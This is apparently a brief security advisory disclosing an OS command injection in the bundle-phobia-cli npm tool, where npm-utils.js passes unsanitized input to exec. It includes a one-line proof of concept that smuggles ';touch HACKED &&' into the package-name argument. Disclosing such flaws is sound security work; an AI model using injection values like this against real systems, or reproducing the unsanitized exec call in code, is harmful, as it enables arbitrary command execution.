OS Command Injection in adrieankhisbe/bundle-phobia-cli
Sep 1st 2020
BundlePhobia is a tool to help you find the cost of adding a npm package to your bundle. It enables you to query package sizes.
npm-utils.js passes unsanitized input to an exec function, which leads to arbitrary code execution (OS command injection).
// Proof of concept from the report: the package-name argument is interpolated
// into a shell command, so the injected ';touch HACKED &&' runs as its own command.
const util = require('./npm-utils.js');
let a = util.getVersionList(';touch HACKED &&');
console.log(a);